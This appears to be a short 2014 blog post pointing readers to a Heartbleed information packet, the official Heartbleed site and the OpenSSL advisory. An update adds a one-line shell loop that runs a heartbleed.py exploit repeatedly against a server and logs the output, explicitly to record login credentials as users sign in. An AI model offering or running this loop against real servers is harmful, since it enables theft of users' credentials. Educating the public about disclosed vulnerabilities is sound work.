Myself and Digi from Crimemachine have whipped up a document to educate the public about this recent vulnerability. With all the information and buzz surrounding this vulnerability, comes a lot of confusion too... We provide this information with the standard disclaimer, this information is for educational purposes only.
Download the Heartbleed - Information Packet (Google Drive)
You will be responsible for your own actions. Use the information sensibly.
Official Website: http://www.heartbleed.com
OpenSSL Advisory: http://www.openssl.org/news/secadv_20140407.txt
Update: A simple shell script for those of you who are dabbling with the code,
root@crimemachine:~# while true;do ./heartbleed.py 192.168.220.133 -p 443;sleep2;done >> /tmp/heartbleed.log
You can iterate the loop and record login credentials when a user logs in to the site/server.
Kish
No comments:
Post a Comment